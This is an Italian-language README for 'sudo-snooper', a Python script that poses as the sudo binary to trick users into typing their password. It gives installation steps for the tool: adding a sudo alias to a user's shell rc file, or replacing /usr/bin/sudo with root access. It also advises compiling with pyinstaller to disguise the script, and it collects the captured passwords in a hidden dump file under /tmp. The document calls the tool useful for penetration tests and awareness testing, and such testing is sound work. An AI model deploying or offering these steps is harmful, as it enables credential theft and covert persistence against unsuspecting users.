
Script Python che si comporta come il binario sudo originale per ingannare gli utenti e far loro inserire le loro password.
sudo-snooper si comporta come il binario sudo originale per indurre gli utenti a inserire la propria password.
Mostrerà un prompt falso proprio come quello originale all'utente per inserire la propria password sudo.
Questo può essere utile in test di penetrazione o valutazioni di sicurezza per testare la consapevolezza degli utenti.
Questa opzione è più facile da realizzare e più portabile, tuttavia potrebbe essere più evidente per utenti attenti.
Modifica il file .rc della shell che l'utente sta utilizzando (può essere .bashrc, .zshrc e così via) e aggiungi quanto segue:
alias sudo='python3 /path/to/sudo-snooper.py'
Assicurati che sudo-snooper.py abbia i permessi corretti.
È necessario l'accesso root per questa opzione di installazione
Questo diventa utile solo se hai già accesso root ma non riesci a decifrare gli hash di /etc/shadow per qualche motivo. In pratica puoi ottenere tramite phishing la password dell'utente.
# mv /usr/bin/sudo /usr/bin/somename
Modifica questi in sudo-snooper.py:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
assegna i permessi necessari al file python
Puoi essere creativo qui e creare un file eseguibile non leggibile per gli utenti, ma non entrerò nei dettagli. Dai un'occhiata ad alcune risposte qui per questo.
NOTA: Un modo un po' più convincente per installarlo è compilarlo usando pyinstaller in modo che non appaia come un file python quando viene eseguito file /usr/bin/sudo.
Per farlo su Archlinux: pyinstaller --onefile sudo-snooper.py funzionerà. Tuttavia, tieni presente che una volta compilato non sarai in grado di modificare i parametri nel binario compilato.
Una volta installato, sudo-snooper può essere chiamato proprio come il normale sudo.
Ad esempio, eseguendo
sudo vim /etc/resolv.conf
farà sì che venga chiamato sudo-snooper (supponendo che sia installato correttamente).
Chiederà la password dell'utente e poi eseguirà il comando reindirizzando al binario sudo reale se la password è corretta.
Puoi quindi recuperare la password dell'utente leggendo il file di dump nelle impostazioni.